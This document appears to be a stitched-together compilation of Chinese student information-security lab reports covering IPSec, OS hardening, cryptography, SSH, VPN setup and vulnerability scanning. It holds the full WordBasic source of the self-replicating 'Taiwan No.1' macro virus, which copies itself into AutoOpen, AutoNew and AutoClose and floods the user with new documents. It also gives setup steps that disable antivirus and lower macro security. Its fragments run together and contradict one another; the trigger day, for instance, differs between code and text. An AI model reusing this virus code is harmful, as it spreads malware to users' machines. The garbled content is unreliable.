信息安全技术实验报告(台湾一号)

实验报告（２０1 / ２０1 学年第学期）课程名称信息安全技术实验名称防火墙和安全IP实验实验时间年月日指导单位指导教师实验报告实验报告实验1 安全IP实验1.安全IP的配置步骤（1）从系统控制面板出发，打开系统与安全功能，打开管理工具选项，找到本地安全策略。

（2）点开本地安全策略，找到本地电脑IP策略。

新建IP安全策略，描述中填写“IPSec 学习练习”，点击下一步，进入配（3）创建IP安全规则，点击增加，进入IP安全规则创建过程；选择“此规则不指定隧道”，即选用传输模式IPSec，选中后单击“下一步”按钮；选择“所有网络连接”，单击“下一步”按钮，进入配置IP过滤器列表阶段。

（4）IP过滤器列表配置。

点击新增按钮，新建IP过滤器列表，进行过滤器列表配置；点击新增，进行IP过滤器配置，点击下一步；描述内容“与同组主机进行安全的icmp通信”；源地址选择“我的IP地址”；目的地址选择“一个特定的IP地址”，填写另一台主机的IP地址，；选择“ICMP”协议类型，单击“下一步”按钮。

单击“完成”按钮，完成IP 过滤器配置。

（5）过滤器行为配置。

根据上图所示，选择新增的过滤器列表，点击下一步，进入过滤器行为配置阶段。

点击新增，进行过滤器行为配置。

行为命名为“安全的ICMP通信”；“筛选器操作常规选项”中选中“协商安全”，单击“下一步”按钮；选中“不与不支持IPSec的计算机通信”，单击“下一步”按钮；在“IP通信安全措施”中，选择“完整性和加密”，单击“下一步”按钮；最后单击“完成”；（6）“身份验证方法”界面。

选中“使用此字符串保护密钥交换(预共享密钥)”，填写共享密钥“lin”(主机A、主机B的共享密钥必须一致)，单击“下一步”按钮，直至最终完成。

（注意：应用策略之前必须指派策略，否则策略不会自动生效。

右键点击“IP安全策略”，选择“指派assign”使策略生效。

）（7）完成IPSec配置。

2.测试结果与分析使用wireshark抓去ping的数据包的报文通常有其固定的格式：报文长度（98bytes）=以太网头（14bytes）+IP头（20bytes）+ICMP报文（64bytes）其中，以太网头（14bytes）=目的MAC（6bytes）+源MAC（6bytes）+以太网类型0800（2bytes）我们以（a）策略为例进行分析：（a）主机A不指派策略，主机B不指派策略。

信息安全实验报告
一、实验目的
本次实验是为了研究信息安全的基本概念，建立一个简单的安全模型，探讨信息安全的模型，并对其进行实验测试，了解信息安全的相关技术，
以及如何保护敏感信息。

二、实验内容
1.定义信息安全
信息安全是指保护敏感信息不被未经授权的人访问、使用或篡改的过程。

2.研究信息安全模型
信息安全模型是一个有机的概念，它包括防御、检测、响应、应急和
恢复5个基本组成部分，旨在保护敏感信息免受未经授权的访问、使用和
篡改。

3.研究信息系统安全技术
为了增强信息安全，引入了一系列安全技术来防止未经授权的访问、
使用或篡改敏感信息，这些技术包括访问控制、身份验证、数据加密和远
程登录安全。

4.建立模型实验
为了检验信息安全模型，本次实验采用Kali Linux作为实验环境，Kali Linux设有访问控制、身份验证、数据加密和远程登录安全等安全
技术，以阻止非法的访问和操纵。

三、实验结果
1.安全技术实施完毕
在实验中，实施了访问控制、身份验证、数据加密和远程登录安全等安全技术，保证了正常的服务器运行。

2.平台安全性测试
采用Metasploit框架进行安全测试。

信息安全操作实验报告实验名称：信息安全操作实验实验目的：1. 掌握信息安全操作的基本知识和技能。

2. 熟悉常用的信息安全操作工具和方法。

3. 培养对信息安全的意识和保护意识。

实验步骤：1. 实验前准备：了解信息安全的基本概念和原则，并掌握常见的信息安全威胁和攻击方式。

2. 实验环境：搭建一个模拟的网络环境，包括若干主机和服务器。

3. 实验内容：3.1. 使用端口扫描工具扫描实验环境中的主机和服务器的开放端口，并记录扫描结果。

3.2. 通过漏洞扫描工具对实验环境中的主机和服务器进行漏洞扫描，并记录扫描结果。

3.3. 使用弱口令攻击工具对实验环境中的主机和服务器进行弱口令攻击，测试其安全性。

3.4. 利用网络钓鱼工具进行网络钓鱼攻击，诱导用户输入敏感信息，并分析攻击效果。

3.5. 使用反弹Shell工具在实验环境中获取目标主机的控制权，并演示如何防范此类攻击。

实验结果：1. 根据扫描结果，分析开放端口的意义和可能的安全威胁，及时进行相应的安全设置和防护措施。

2. 根据漏洞扫描结果，及时修补系统和应用程序的漏洞，以提高信息系统的安全性。

3. 验证弱口令攻击的威胁，警醒用户要设置强密码，并做好密码管理和定期更改密码的习惯。

4. 通过网络钓鱼攻击的演示，提高用户的警觉意识，防范钓鱼等社交工程攻击。

5. 演示防范反弹Shell攻击的方法，包括防火墙设置、入侵检测系统的配置和使用，提高系统的安全性。

实验结论：通过本次实验，我深刻认识到了信息安全的重要性和必要性。

信息安全操作是保护个人隐私、企业重要信息及国家安全的重要手段。

在实际工作和生活中，我们要时刻保持对信息安全的警惕，并采取相应的安全操作措施。

不仅对个人而言，企业和政府也要高度重视信息安全，加强信息安全的培训和管理，确保信息系统的安全稳定运行。

在信息安全操作中，要掌握一些基本的安全工具和方法，如端口扫描、漏洞扫描、弱口令攻击和网络钓鱼攻击等。

了解这些攻击手段和防范方法，有助于提升自身的信息安全意识和能力。

实验报告学院:信息学院专业：信息治理与信息系统专业班级：信息13-1姓名刘斌彬学号130814102实验组实验时刻2016年指导教师蓝海洋成绩实验项目名称Windows操作系统安全，Linux操作系统安全实验目的1.掌握windows账户与密码的设置方法2.掌握文件系统的爱护和加密方法3.掌握windows操作系统安全策略与安全模板的使用，审核和日志的启用方法4.掌握windows操作系统漏洞检测软件MBSA的使用方法，建立一个windows操作系统差不多安全框架5.通过实验掌握linux操作系统（以下简称linux）环境下的用户治理，进程治理以及文件治理的相关操作命令，掌握linux中的相关安全配置方法，建立起linux的差不多安全框架实验要求通过这次的实验学习，学生要学会windows操作系统和linux操作系统的差不多差不多安全配置。

实验原理一.Windows操作系统的安全原理1.账户和密码账户和密码是登录系统的基础，同时也是众多黑客程序攻击和窃取的对象。

因此，系统账户和密码的安全是极其重要的，必须通过配置来实现账户和密码的安全。

一般用户常常在安装系统后长期使用系统的默认设置，忽视了windows 系统默认设置的不安全性，而这些不安全性常常被攻击者利用，通过各种手段获得合法的账户，进一步破解密码，从而达到非法登录系统的目的。

因此，首先需要保障账户和密码的安全。

2.文件系统磁盘数据被攻击者或本地的其他用户破坏和窃取是经常困扰用户的问题，文件系统的安装问题也是特不重要的。

Windows系统提供的磁盘格式有FAT，FAT32以及NTFS。

其中，FAT，FAT32没有考虑安全到安全性方面的更高需求，例如无法设置用户访问权限等。

NTFA文件系统是Windows操作系统的一种安全的文件系统，治理员或者用户能够设置每个文件夹及每个文件的访问权限，从而限制一些用户和用户组的访问，以保障数据安全。

3.数据加密软件EFSEFS（encrypting file system，加密文件系统）是windows2000以上的版本操作系统所特有的一个有用功能，NTFS卷上的文件和数据，都能够直接被操作系统加密和保存，在专门大程度上提高了数据的安全性。

信息安全技术实验报告一.实验目的本实验旨在探究信息安全技术在网络通信中的应用，了解加密算法和数字签名的基本原理，并通过实际操作掌握其具体实现过程。

二.实验内容1.对称加密算法实验-选择一种对称加密算法，如DES或AES，了解其基本原理和加密流程。

- 使用Python编写对称加密算法的实现程序。

-在实验过程中，通过设计不同的密钥长度和明文信息，观察加密结果的变化。

2.非对称加密算法实验-选择一种非对称加密算法，如RSA，了解公钥和私钥的生成方法。

- 使用Python编写非对称加密算法的实现程序。

-在实验中，生成一对密钥，并将公钥用于加密明文，私钥用于解密密文。

观察加密和解密过程是否正确。

3.数字签名实验-了解数字签名的基本原理和应用场景。

- 使用Python编写数字签名的实现程序。

-在实验中，生成一对密钥，并使用私钥对明文进行签名，再使用公钥验证签名的正确性。

三.实验步骤及结果1.对称加密算法实验-选择了AES加密算法，其基本原理是将明文分组并通过多轮加密运算得到密文。

- 编写了Python程序实现AES加密算法，并进行了调试。

-在不同的密钥长度和明文信息下，得到了不同的加密结果。

观察到密钥长度的增加可以提高加密的安全性。

2.非对称加密算法实验-选择了RSA加密算法，其基本原理是使用两个密钥，公钥用于加密，私钥用于解密。

- 编写了Python程序实现RSA非对称加密算法，并进行了调试。

-成功生成了一对密钥，并使用公钥加密明文，私钥解密密文，观察到加密和解密结果正确。

3.数字签名实验-了解到数字签名可以保证数据的完整性和真实性。

- 编写了Python程序实现数字签名的生成和验证功能，并进行了调试。

-成功生成了一对密钥，并使用私钥对明文进行签名，再使用公钥验证签名的正确性。

四.实验总结本次实验通过对称加密算法、非对称加密算法和数字签名的实现，加深了对信息安全技术的理解和认识。

通过实际操作，掌握了加密算法和数字签名的基本原理和实现过程。

信息安全技术实验报告信息安全技术实验报告1、引言在这一章节中，要介绍实验的背景和目的，并给出实验的整体概述。

2、实验设计在这一章节中，要详细说明实验的设计和方法，包括实验所使用的设备和工具，实验所涉及的软件和硬件环境，以及实验的步骤和流程。

3、实验结果在这一章节中，要展示实验的结果和数据，并进行相应的分析和解释。

需要提供实验数据的图表和说明，以支持实验结果的正确性和可靠性。

4、实验讨论在这一章节中，要对实验的结果进行详细的讨论和分析，包括实验结果与实验目的的一致性、实验中可能存在的不确定性和误差以及实验结果的意义和应用。

5、实验总结在这一章节中，要对整个实验进行总结和评价，并提出可能的改进和建议。

同时，还要对实验过程中的问题和困难进行反思和总结，以便未来的实验能够更加顺利和有效地进行。

6、附录在这一章节中，要给出实验过程中使用的代码、配置文件、数据等附件的详细说明和说明。

需要标明每个附件的名称、作用和相关信息。

本文所涉及的法律名词及注释：1、信息安全：指在计算机系统和网络中，保护信息及其基础设施不受未经授权的访问、使用、披露、破坏、修改、干扰，以确保信息的保密性、完整性和可用性的一系列措施和技术。

2、数据隐私：指个人或组织的敏感信息和个人身份信息等数据的保护，以确保不被未经授权的访问、使用、披露和存储。

3、网络攻击：指对计算机系统和网络进行非法的访问、入侵、破坏、干扰或盗取信息等行为。

4、防火墙：指一种安全设备或软件，用于过滤网络流量，防止未经授权的访问和网络攻击。

本文档涉及附件：1、实验代码：文件名为《实验代码：zip》，包含所有实验所需的代码和脚本文件。

2、实验数据：文件名为《实验数据：xlsx》，包含所有实验所的数据和结果。

3、实验配置文件：文件名为《实验配置文件：txt》，包含实验过程中使用的配置文件和参数。

信息安全技术专业大学生实习报告
尊敬的老师：
我是XXXXXXXX学院信息安全技术专业的学生，在这几个月的实习工作中，我主要负责网站编辑工作，在工作中，我学到和领悟到了很多东西，实习期间，我努力将自己在校学习的理论知识向实践方面转化，尽量做到理论和实际相结合。

在实习期间，能遵守工作纪律，不迟到，不早退，认真完成领导交给的工作。

在实习的期间里,有苦也有甜,有快乐也有不适, 一开始上班的时候，我的心情激动、兴奋、期盼、喜悦。

我相信，只有我认真学习，好好把握，做好每一件事，实习肯定会有成绩。

但后来很多东西看看简单，其实要做好它很不容易。

下面着重汇报一下我在此次实习中的具体实习内容以及我个人的实习体会。

在网络中心同事的安排下，实习期间，我共参与或个人承担了以下工作：电脑硬件组装，系统安装调试，专业网络布线、ftp 信息服务器日常维护、www 服务器日常安全检测、局部网络故障检测与排除、校内单位硬件更新等。

信息安全技术实验报告一、实验内容1 、在自己的计算机上，架构两台2003服务器，其中一台配置为两张网卡，另外一台配置为单网卡。

2 、拥有两张网卡的的2003服务器，将一张网卡连接在公网口上，另一张网卡设置在仅本地。

启动机器后在路由和远程访问中启用VPN服务。

3 、拥有单张网卡的服务器，添加以下几个组件：IIS, DNS,DHCP,IAS,设置DNS 中的地址记录；模拟一个web站点；配置RADIUS.二、实验步骤1 、在自己的计算机上，架构两台2003服务器，其中一台配置为两张网卡，另外一台配置为单网卡。

单击next单击next单击next，然后单击单击Browse选择虚拟硬盘存储路径。

next。

选择Differencing然后next。

然后选择Browse选择2003母盘位置，然后next。

单击finish完成创建虚拟硬盘。

单击next。

选择此项，单击next。

然后单击Browse选择虚拟机存储路径。

next。

此项选择2003。

next。

选择内存大小。

next。

选择此项，next。

然后单击Browse选择刚才创建的虚拟硬盘。

Next。

finish完成创建虚拟机。

另一台虚拟机架构步骤同上。

此时选择Settings。

设置网卡数量为2。

单击ok完成设置。

2 、拥有两张网卡的的2003服务器，将一张网卡连接在公网口上，另一张网卡设置在仅本地。

启动机器后在路由和远程访问中启用VPN服务。

启动拥有两张网卡的2003服务器。

打开网络连接。

本地连接为默认设置。

需要设置本地连接2。

右键单击本地本地连接2，选择属性，双击Internet协议(TCP/IP)。

如上图设置IP地址和子网掩码。

打开管理工具中的路由和远程访问项。

右键单击此项，选择配置并启用路由和远程访问。

单击下一步。

选择此项，单击下一步。

选择此项，单击下一步。

选择本地连接2。

下一步。

选择此项，下一步。

单击新建。

设置范围，确定。

下一步。

选择此项，下一步。

下一步。

信息安全技术实验报告——创建信息加解密系统一：实验内容:用AES算法实现对文件的加解密，创建一个简单的文件加解密系统。

二：实验要求：写出基本的实验步骤，如何实现，主要代码，以及实验结果。

要求结构清晰，步骤完整，思路明确。

掌握AES算法的基本原理，了解文件加解密流程。

三：详细实验步骤：1.AES算法简介：AES（The Advanced Encryption Standard）是美国国家标准与技术研究所用于加密电子数据的规范。

它被预期能成为人们公认的加密包括金融、电信和政府数字信息的方法。

本文展示了 AES的概貌并解析了它使用的算法。

包括一个完整的C#实现和加密.NET 数据的举例。

在读完本文后你将能用AES加密、测试基于AES的软件并能在你的系统中使用AES加密。

美国国家标准与技术研究所(NIST)在2002年5月26日建立了新的高级数据加密标准(AES)规范。

本文中我将提供一个用C#编写的的能运行的 AES 实现，并详细解释到底什么是 AES 以及编码是如何工作的。

我将向您展示如何用 AES 加密数据并扩展本文给出的代码来开发一个商业级质量的 AES 类。

我还将解释怎样把 AES 结合到你的软件系统中去和为什么要这么做，以及如何测试基于 AES 的软件。

注意本文提供的代码和基于本文的任何其它的实现都在联邦加密模块出口控制的适用范围之内（详情请参看 Commercial Encryption Export Controls ）。

AES 是一个新的可以用于保护电子数据的加密算法。

明确地说，AES 是一个迭代的、对称密钥分组的密码，它可以使用128、192 和 256 位密钥，并且用 128 位（16字节）分组加密和解密数据。

与公共密钥密码使用密钥对不同，对称密钥密码使用相同的密钥加密和解密数据。

通过分组密码返回的加密数据的位数与输入数据相同。

迭代加密使用一个循环结构，在该循环中重复置换（permutations ）和替换(substitutions）输入数据。

一、实验目的本次实验旨在通过实际操作，了解信息安全检测的基本原理和方法，掌握常用的信息安全检测工具的使用，提升对信息系统的安全评估能力，为保障信息系统安全提供技术支持。

二、实验环境1. 操作系统：Windows 102. 安全检测工具：Nessus、AWVS、AppScan3. 实验网络：局域网环境，包含一台服务器和若干台客户端计算机三、实验内容1. 系统漏洞扫描（1）使用Nessus进行系统漏洞扫描- 安装Nessus并配置好扫描目标- 选择合适的扫描策略，启动扫描任务- 分析扫描结果，识别潜在的安全风险（2）使用AWVS进行Web应用漏洞扫描- 安装AWVS并配置好扫描目标- 选择合适的扫描策略，启动扫描任务- 分析扫描结果，识别Web应用中的安全漏洞2. 应用程序安全检测（1）使用AppScan进行应用程序安全检测- 安装AppScan并配置好检测目标- 选择合适的检测策略，启动检测任务- 分析检测结果，识别应用程序中的安全风险3. 安全事件分析- 收集实验过程中产生的安全事件日志- 使用安全事件分析工具（如Splunk）对日志进行分析- 识别异常行为，发现潜在的安全威胁四、实验步骤1. 准备实验环境- 安装操作系统、安全检测工具和实验网络- 配置好扫描目标和检测目标2. 进行系统漏洞扫描- 使用Nessus对服务器进行系统漏洞扫描- 使用AWVS对Web应用进行漏洞扫描3. 进行应用程序安全检测- 使用AppScan对应用程序进行安全检测4. 安全事件分析- 收集安全事件日志- 使用安全事件分析工具进行分析五、实验结果与分析1. 系统漏洞扫描- Nessus扫描结果显示，服务器存在多个已知漏洞，包括SQL注入、跨站脚本等- AWVS扫描结果显示，Web应用存在多个安全漏洞，包括SQL注入、文件上传等2. 应用程序安全检测- AppScan检测结果显示，应用程序存在多个安全风险，包括SQL注入、跨站脚本等3. 安全事件分析- 安全事件分析结果显示，实验过程中存在异常行为，如频繁访问敏感文件、异常登录尝试等六、实验总结本次实验通过对信息安全检测工具的使用，成功识别了服务器、Web应用和应用程序中的安全漏洞和风险。

. 实验序号： 3《信息安全技术》实验报告实验名称：网络信息通信姓名：学院：专业：网络工程班级：学号：指导教师：实验地址：实验日期：实验3.1 SSH网络安全通信实验1.请回答实验目的中的思考题。

（1）网络通信加密系统有哪几类？分别有哪些加密算法？答：一般的数据加密可以在通信的三个层次来实现链路加密，借点加密和端到端加密。

采用混合加密体制，即数据以外部CBC模式的三重IDEA算法加密，密钥以RSA 加密，并用单项安全函数SHA-1实现签名。

（2）网络通信中有哪些应用需要用到加密？答：文件压缩，电子邮箱，游戏等。

（3）SSH协议能够用于解决现有的哪些网络通信协议存在的安全问题？它能为用户提供哪些网络安全通信应用？答：SSH把所有传输的数据进行加密，它既可以代替Telnet,又可以为FTP提供一个安全的通道，这样就可以防止网络窃听及中间人等攻击方式。

SSH为用户提供的网络安全通信应用有：远程安全登录，远程安全拷贝，安全文件传输，端口映射以及SOCK5代理等。

2.分析说明SSH的安全通信原理。

原理：ssh利用rsa加密的不对称性，在两种之间分享一把只有他们两个人才知道的通信密钥，通过这个通信密钥，他们再进行之后的通信。

客户端计算机用ssh主机名连到到主机名所指定的服务器，ssh询问服务器缺省的连接端口一般是22端口，就是向服务器请求服务，服务器收到请求后会把自己的公钥发送给对方，服务器发送给客户端计算机公钥。

客户端计算机拿到公钥后，会把自己的通讯密钥，然后，把自己客户端的通讯密钥用服务器给的公钥来加密，形成密文，将密文发送给服务器，然后，服务器用私钥解密出来，解密出来后，通讯密钥就被解密出来了，于是，通讯双方就共同拥有了双方的小秘密-通讯密钥，双方就可以通过通讯密钥来对通讯内容加密来进行传送，由于其他第三方无法得知通讯密钥，也就无法解密密文，双方有共同的通讯密钥的情况下，双方就不需要rsa加密算法了。

信息安全技术实验报告《信息安全技术》实验报告学院计算机科学与⼯程学院学号姓名实验⼀、DES加解密算法⼀、实验⽬的1. 学会并实现DES算法2. 理解对称密码体制的基本思想3. 掌握数据加密和解密的基本过程⼆、实验内容根据DES加密标准，⽤C++设计编写符合DES算法思想的加、解密程序，能够实现对字符串和数组的加密和解密。

三、实验的原理美国IBM公司W. Tuchman 和 C. Meyer 1971-1972年研制成功。

1967年美国Horst Feistel提出的理论。

美国国家标准局（NBS)1973年5⽉到1974年8⽉两次发布通告，公开征求⽤于电⼦计算机的加密算法。

经评选从⼀⼤批算法中采纳了IBM的LUCIFER⽅案。

DES算法1975年3⽉公开发表，1977年1⽉15⽇由美国国家标准局颁布为联邦数据加密标准（Data Encryption Standard），于1977年7⽉15⽇⽣效。

为⼆进制编码数据设计的，可以对计算机数据进⾏密码保护的数学运算。

DES 的保密性仅取决于对密钥的保密，⽽算法是公开的。

64位明⽂变换到64位密⽂，密钥64位，实际可⽤密钥长度为56位。

运⾏结果:四、思考题1．分析影响DES密码体制安全的因素？答: 影响DES密码体制安全的因素主要是密钥的健壮性。

2．公钥算法中加密算法和解密算法有何步骤？答:DES密码体制中加密算法和解密算法流程相同，区别在于解密使⽤的⼦密钥和加密的⼦密钥相反实验⼆、操作系统安全配置⼀、实验⽬的1．熟悉Windows NT/XP/2000系统的安全配置2. 理解可信计算机评价准则⼆、实验内容1.Windows系统注册表的配置点击“开始\运⾏”选项，键⼊“regedit”命令打开注册表编辑器，学习并修改有关⽹络及安全的⼀些表项2．Windows系统的安全服务a．打开“控制⾯板\管理⼯具\本地安全策略”，查阅并修改有效项⽬的设置。

b．打开“控制⾯板\管理⼯具\事件查看器”，查阅并理解系统⽇志，选⼏例，分析并说明不同类型的事件含义。

计算机病毒实验报告姓名：学号:老师：日期：一. 实验目的台湾1号病毒是一种破坏力较大的宏病毒！Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。

本实验演示了宏的编写，通过台湾1号病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。

二. 实验内容1. macro virus中的内容2.计算机病毒篇 ---->计算机宏病毒三. 实验环境1. macro virus硬件设备：局域网，终端PC机。

系统软件：Windows系列操作系统支撑软件：Word 2003软件设置：关闭杀毒软；打开Word 2003，在工具→宏→安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic项目的访问.实验环境配置如下图所示：受感染终端受感染Word文档被感染终端2.计算机宏病毒硬件设备：部署 WIN2003 系统的PC 机一台软件工具：Office word2007四．实验步骤及截图台湾1号病毒代码Taiwan No.1 病毒原始码Dim Shared nm(4)Sub MAINDisableInput 1If Day(Now()) = 13 Thentry:On Error Goto 0On Error Goto trytest = - 1con = 1tog$ = ""i = 0While test = - 1For i = 0 To 4nm(i) = Int(Rnd() * 10000)con = (con * nm(i))If i = 4 Thentog$ = tog$ + Str$(nm(4)) + " =?"Goto begEnd Iftog$ = tog$ + Str$(nm(i)) + " *"Next irem 随机选出四个千位数, 以便等一下的游戏Beeprem 电脑发出" 哔"一声ans$ = InputBox$("今天是" + Date$() + " ,跟你玩一个心算游戏" + Chr$(13) + /"若你答错,只好接受震撼教育.............." + Chr$(13) + /tog$, "台湾NO.1 Macro Virus")rem 开个对话盒, 以便输入解答用If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) ThenMsgBox "恭贺你答对了,按确定就告诉你想知道的....", /"台湾NO.1 Macro Virus"FileNewDefaultCenterParaFormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 BeepInsert "何谓巨集病毒？"InsertParaInsert "答案:"Italic 1Insert "我就是....."InsertParaInsertParaItalic 0FormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 BeepInsert "如何预防巨集病毒？"InsertParaBeepInsert "答案:"Italic 1Insert "不要看我....."Goto exitElseFor j = 1 To 20BeepFileNewDefaultNext jCenterParaFormatFont .Font = "细明体", .Points = 16, .Bold = 1, .Underline = 1 Insert "巨集病毒"Goto tryEnd IfWendEnd Ifnor = CountMacros(0)If nor > 0 ThenFor kk = 1 To norIf MacroName$(kk, 0) = "AutoOpen" Then t = 1End IfNext kkEnd Iffile$ = FileName$()filem$ = file$ + ":AutoOpen"If t <> 1 ThenMacroCopy filem$, "AutoOpen"MacroCopy filem$, "AutoNew"MacroCopy filem$, "AutoClose"End Ifnor1 = CountMacros(1)If nor1 > 0 ThenFor kkk = 1 To nor1If MacroName$(kkk, 1) = "AutoOpen" Then tt = 1End IfNext kkkEnd IfIf tt <> 1 ThenFileSaveAs .Format = 1MacroCopy "AutoOpen", filem$End Ifexit:End Sub该病毒的效果如下：当打开被感染的word文档时，首先进行自我复制，感染word模板，然后检查日期，看是否是1日（即在每月的1日会发作），然后跳出一个对话框，要求用户进行一次心算游戏，这里只用四个小于10的数相乘，如果作者的计算正确，那么就会新建一个文档，跳出如下字幕：何谓宏病毒答案：我就是......将系统日期设为XX月1号如果答错，就会不停地刷屏，然后继续让你答题，否则跳出如下界面:计算机宏病毒1). 新建Word 文档并打开2). 调出开发工具,设置宏的等级，启用宏3). 创建宏，命名AutoExec 编辑4). 编辑宏，语法上注意VBA 版本保存5). 关闭所有Word（必须）6). 再次打开Word 文档，宏病毒爆发,弹出刚刚编写的msgbox 窗口7). 启动任务管理器结束进程搜索winword.exe 文件，并确定复制其位置8). 启用CMD,定位winword 位置：输入命令，用参数来打开安全模式winword.exe /a（执行此命令2 次）第一次安全模式第二次新建文档进行宏的打开设置来禁用宏9). 搜索normal.dotm 等模板文件，若搜索不出东西，在高级选项中选中搜索隐藏文件及系统文件即可，并删除那个文件夹下的所有模板10). 简易摆脱宏完成，重新打开word,没有被感染。

一、实验背景随着互联网的普及和信息技术的快速发展，信息安全问题日益凸显。

为了提高学生对信息安全知识的理解和实践能力，我们进行了本次信息安全实验。

通过实验，使学生了解信息安全的基本概念、技术手段和防范措施，增强学生的网络安全意识。

二、实验目的1. 了解信息安全的基本概念和常见的安全威胁；2. 掌握信息安全防护的基本技术；3. 培养学生的动手实践能力，提高学生的信息安全防护意识。

三、实验内容1. 信息安全基础知识（1）了解信息安全的基本概念，包括信息安全、保密性、完整性、可用性、可靠性等；（2）掌握信息安全的基本原则，如最小权限原则、最小化原则、完整性原则等；（3）了解信息安全面临的常见威胁，如恶意软件、网络攻击、信息泄露等。

2. 信息安全防护技术（1）学习并掌握密码学的基本原理和应用，如对称加密、非对称加密、哈希算法等；（2）了解防火墙、入侵检测系统、漏洞扫描等安全设备的工作原理和应用；（3）学习网络安全防护的基本技术，如VPN、SSH、SSL/TLS等。

3. 信息安全实验操作（1）使用工具对文件进行加密和解密，验证加密算法的安全性；（2）配置防火墙规则，实现网络访问控制；（3）使用入侵检测系统检测网络中的异常行为；（4）进行漏洞扫描，发现系统中的安全隐患。

四、实验步骤1. 安装实验环境（1）安装操作系统，如Windows、Linux等；（2）安装实验所需的软件，如加密工具、防火墙、入侵检测系统等。

2. 学习信息安全基础知识（1）阅读教材、资料，了解信息安全的基本概念、技术手段和防范措施；（2）观看相关视频教程，加深对信息安全知识的理解。

3. 信息安全实验操作（1）使用加密工具对文件进行加密和解密，验证加密算法的安全性；（2）配置防火墙规则，实现网络访问控制；（3）使用入侵检测系统检测网络中的异常行为；（4）进行漏洞扫描，发现系统中的安全隐患。

4. 实验报告撰写（1）整理实验过程中的问题和解决方案；（2）总结实验结果，对实验内容进行分析和评价；（3）撰写实验报告，包括实验目的、内容、步骤、结果、分析和结论等。

一、实验背景随着信息技术的飞速发展，信息安全已经成为当今社会的重要议题。

为了提高学生对信息安全技术的理解和实践能力，我们开展了信息安全技术实验课程。

本实验旨在让学生通过实际操作，加深对密码学、网络安全、恶意代码防范等知识点的理解，并掌握相应的安全防护技能。

二、实验目的1. 理解密码学的基本原理，掌握常用加密算法的使用方法。

2. 了解网络安全的基本概念，掌握防火墙、入侵检测等安全防护技术。

3. 熟悉恶意代码的防范方法，提高计算机安全意识。

4. 培养学生的实践动手能力和团队协作精神。

三、实验内容1. 密码学实验（1）实验名称：DES加密算法实验（2）实验目的：掌握DES加密算法的原理和使用方法。

（3）实验内容：使用Python编写程序，实现DES加密和解密功能。

2. 网络安全实验（1）实验名称：防火墙配置实验（2）实验目的：掌握防火墙的基本配置方法。

（3）实验内容：使用防火墙软件（如NAT防火墙）配置防火墙规则，实现对内外网络的访问控制。

（4）实验名称：入侵检测实验（5）实验目的：掌握入侵检测系统的原理和使用方法。

（6）实验内容：使用入侵检测软件（如Snort）进行网络流量分析，识别潜在入侵行为。

3. 恶意代码防范实验（1）实验名称：病毒分析实验（2）实验目的：掌握恶意代码的识别和分析方法。

（3）实验内容：使用杀毒软件（如瑞星杀毒）对恶意代码进行分析，了解其传播途径和危害。

四、实验步骤1. 密码学实验（1）安装Python开发环境。

（2）编写Python程序，实现DES加密和解密功能。

（3）测试程序，验证加密和解密效果。

2. 网络安全实验（1）安装防火墙软件。

（2）配置防火墙规则，实现对内外网络的访问控制。

（3）使用Snort进行网络流量分析，识别潜在入侵行为。

3. 恶意代码防范实验（1）下载恶意代码样本。

（2）使用杀毒软件对恶意代码进行分析。

（3）总结恶意代码的传播途径和危害。

五、实验结果与分析1. 密码学实验通过实验，掌握了DES加密算法的原理和使用方法，能够使用Python程序实现DES加密和解密功能。

信息安全技术实验报告1. 引言1. 背景介绍：说明本次实验的背景和目的。

2. 实验对象：详细描述所使用的软件、硬件或网络设备等。

2. 实验设计与方法1. 设计思路：阐述解决问题时采用的整体方案和策略。

2. 方法步骤：a) 步骤一: 描述第一个具体操作步骤，包括设置参数、执行命令等。

b) 步骤二: 描述第二个具体操作步骤，同样需要包含相关参数和命令。

...n) 最后一个步骤: 继续按照相同格式描述其他所有必要且有关联性的操作。

3．结果分析与讨论在这一章节中，请提供对于每个实际测试情境下得到数据进行评估，并给出合理有效地建议。

可以参考以下结构来组成该部分内容：- 数据收集及处理（Data Collection and Processing）: - 针对不同场景/条件下获得了哪些数据？- 如何获取并记录这些数据？- 结果展示（Results Presentation）:提供图表以直观呈现你们在上面定义好之“针对某种特定类型攻击”的各项指标。

- 结果分析（Results Analysis）:通过对上述结果的观察和比较，你们能得出什么结论？4. 实验总结在这一章节中，请提供一个简要且准确地描述实验过程、所获数据以及相关问题解决方案。

同时还可以讨论下面两个主题：a) 总体感受：分享整个实验期间遇到的困难或挑战，并阐明如何克服它们。

b) 改进建议：根据本次实践经历，指出哪些部分需要改善并给予具体意见。

5．附件：所有与该报告有关联性但无法直接插入正文的文件名字列表6．法律名词及注释：提供在全文涉及到之任何专业术语/缩写等内容后添加相应定义说明。